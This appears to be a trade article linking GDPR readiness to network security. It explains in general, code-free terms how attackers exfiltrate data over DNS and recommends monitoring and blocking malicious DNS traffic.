A new Doomsday Clock is ticking down and it’s set for May 25th 2018. Global catastrophe? Maybe. It just depends on if businesses are ready to handle the possible implications of the new data protection police, the General Data Protection Regulation (GDPR).
GDPR is a wide-reaching set of rules that you must comply with if you’re holding data about Europeans citizens, which let’s face it, could be any business today. In today’s new data world, it’s a safeguard to protect against data loss and network breaches, which have spiraled out of control in the last few years. Without much in the way of regulation, companies that have been breached could get away with an apology, a crashing share price and probably an executive resignation or two. Now, this is about to change with catastrophic fines looming in the distance. So not only will data breaches have a significant effects on those whose data is stolen; with GDPR, it will now reflect on companies that have been breached – to the tune of penalties between two to four percent of global revenue as well as sanctions that can force organizations to stop processing user data altogether.
However, there are a lot of grey areas in the GDPR, and it is unclear how exactly compliance will play out. So while a recent PWC study reported that CIOs claim to be allocating millions of dollars of budget to accommodate GDPR, how do they know they are putting it in the right places? Where should they start?
It is important for organizations to have strong policies in place, and compliance doesn’t need to be difficult. The easiest place to start is by enhancing your network security.
There are many ways to protect data, but the one that is often neglected is the unauthorized copying or retrieval of data via the Domain Name Server, also known as data exfiltration via DNS. A new IDC report looks at how DNS-based attacks have become a significant risk and must be considered as part of GDPR preparation.
DNS exfiltration is often part of an advanced persistent threat-based attack. Attackers inside your network spend time finding valuable data, but then have to remove it. While most security systems block obvious data transfer mechanisms like FTP, common internet protocols, like DNS, are often left unsecured. That gives attackers a loophole - one where connections to arbitrary servers aren’t blocked.
There are two ways data can be extracted over your network using DNS. The first is a slow but effective method where hackers embed blocks of encoded data within requests. The second is using an approach called tunneling, which exfiltrates data within the DNS tunnel to an accomplice name server. This offers attackers a command and control channel for their tools and creates a fast way of extracting data, with one known attack delivering 18,000 credit card numbers a minute to an attacker’s server.
Cybercriminals are using DNS for data exfiltration because traditional security tools are typically able to lock down the easiest routes out of your network via more common protocols such as HTTP and FTP. So now attackers must explore, experiment with and take advantage of other protocols.
The second, and perhaps more important, is that it’s easy to hide exfiltrated data within the normal operation of a DNS service. All of today’s applications are IP-based and are using DNS - which means that most DNS servers are constantly busy. Then there’s the additional problem of living in a world where BYOD and public Wi-Fi are prolific, making access to DNS by devices that we don’t know and don’t manage an everyday occurrence. The sheer volume of traffic makes it hard to see the requests used for exfiltration, especially when they can be spaced out over time using to look like normal traffic.
So how can you protect your networks? First, you need to inspect your traffic. Traditional monitoring techniques have a risk of blocking legitimate traffic. After all, just because a DNS request is going to an unknown server doesn’t mean it’s malicious and it’s impossible to know every server in use. If you embed security tools into your DNS servers to see what is happening inside the DNS servers themselves, you have a better overview.
Once you’ve identified any malicious traffic, you can start to alleviate it. One option is to block malicious domains as soon as they’re identified; and use DNS reputation tools to reduce the risks of both false positives and false negatives. You can also examine the traffic from specific questionable devices on your network to further target suspicious activities. Ideally, you want to identify attacks quickly or in real-time.
Keeping on top of DNS security is the first step to help with GDPR compliance, as it’s not purely a matter of avoiding breaches - it’s also a matter of timely reporting if data has been stolen. If you report breaches to the appropriate data protection bodies within 72 hours, you remain compliant. We are in an increasingly dangerous world; and one where data is valuable to companies – and to attackers. GDPR puts an onus on companies to be as secure as possible, with significant penalties for failure. That requires doing much more than protecting your databases, but protecting every part of your IP networks as well.